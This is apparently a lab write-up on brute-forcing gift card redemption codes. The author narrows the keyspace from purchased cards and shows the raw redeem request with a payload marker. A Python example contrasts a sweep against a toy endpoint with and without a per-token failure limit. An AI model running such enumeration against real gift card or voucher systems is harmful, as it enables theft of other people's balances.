Brute force. Can you redeem gift vouchers that don't belong to you?
After loading up the lab, go ahead and register an account. Navigating to the gift card page, I started examining the setup for gift card redemption, and the code format looked like "CAFE-XXXX-XXXX-XXXX". In my head I started thinking this brute force might take a while. So instead of firing up a blind brute force attempt, I decided to purchase a couple of gift cards, and I noticed that they all had the same format.
CAFE-0903-AJPX
CAFE-0903-ANPI
CAFE-0903-AQPS
We can assume the format is going to be "CAFE-0903-AXXX", which shrinks our search space significantly. I fired up Burp Suite and started Intruder to brute force the gift card codes, but I realized very quickly that this was going to take ages (since I don't have a professional license). Instead I had my good pal Claude write me some Python code that would generate payloads based on whatever parameters I needed; in this case it was "AAA" through "ZZZ". I then switched over to Caido and tossed the request into Automate, loaded my generated payload file and started firing away.
POST /api/giftcards/redeem HTTP/1.1
Host: lab-1773063210289-04w2oo.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJ0ZXN0XzEiLCJpYXQiOjE3NzMwNjMyNTh9.-M8wHLlqBZu-gUYuFrLeuEW_INAOhdyzbz9MAhQzPjk
Content-Length: 25
Origin: https://lab-1773063210289-04w2oo.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1773063210289-04w2oo.labs-app.bugforge.io/giftcards
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"code":"CAFE-0903-A$QPS$"}
Give it a few minutes and you may just find yourself a valid code, and maybe even a flag!
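The reason this works is the gap between the advertised format and the real one: a predictable prefix collapses the search space from 36^12 codes to 26^3. The Python below is an added example (not the lab's code or the original post's payload generator) that quantifies that gap and models the one control the redeem endpoint is missing, a per-token failure budget; the endpoint class and its max_failures value are constructed assumptions, not the lab's implementation.

```python
import itertools
import string
from collections import defaultdict

# Formats from the write-up: what the redemption form advertised versus what
# the purchased cards actually looked like ('X' marks a varying position).
NOMINAL_FORMAT = "CAFE-XXXX-XXXX-XXXX"
OBSERVED_FORMAT = "CAFE-0903-AXXX"
ALNUM = string.ascii_uppercase + string.digits
# The three codes seen on purchased cards in the write-up.
KNOWN_CODES = ["CAFE-0903-AJPX", "CAFE-0903-ANPI", "CAFE-0903-AQPS"]

def keyspace(fmt, alphabet):
    """Distinct codes the format can hold when every 'X' is drawn from alphabet."""
    return len(alphabet) ** fmt.count("X")

def hours_to_exhaust(space, requests_per_second):
    """Wall-clock hours needed to submit every code at a fixed request rate."""
    return space / requests_per_second / 3600

class RedeemEndpoint:
    """Toy stand-in for POST /api/giftcards/redeem (constructed, not the lab's code).
    Each bearer token gets a failure budget (max_failures, an assumed policy value);
    once spent, further attempts are rejected before the code is even checked."""
    def __init__(self, valid_codes, max_failures):
        self.valid = set(valid_codes)
        self.max_failures = max_failures
        self.failures = defaultdict(int)
        self.redeemed = set()

    def redeem(self, token, code):
        if self.failures[token] >= self.max_failures:
            return "locked"
        if code in self.valid and code not in self.redeemed:
            self.redeemed.add(code)
            return "redeemed"
        self.failures[token] += 1
        return "invalid"

def sweep(endpoint, token):
    """Submit every CAFE-0903-AAAA..AZZZ code with one token; tally the responses."""
    tally = defaultdict(int)
    for letters in itertools.product(string.ascii_uppercase, repeat=3):
        tally[endpoint.redeem(token, "CAFE-0903-A" + "".join(letters))] += 1
    return dict(tally)

if __name__ == "__main__":
    print(keyspace(NOMINAL_FORMAT, ALNUM), keyspace(OBSERVED_FORMAT, string.ascii_uppercase))
    print(hours_to_exhaust(keyspace(OBSERVED_FORMAT, string.ascii_uppercase), 20))
    print(sweep(RedeemEndpoint(KNOWN_CODES, max_failures=10**9), "token-A"))
    print(sweep(RedeemEndpoint(KNOWN_CODES, max_failures=10), "token-B"))
```

With no budget the sweep recovers all three known codes; with a budget of ten failures the same sweep is locked out after ten guesses, which is the behaviour a defender would want to see in the redeem endpoint's logs.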
No AI used in the making of this post, that I know of at least 😀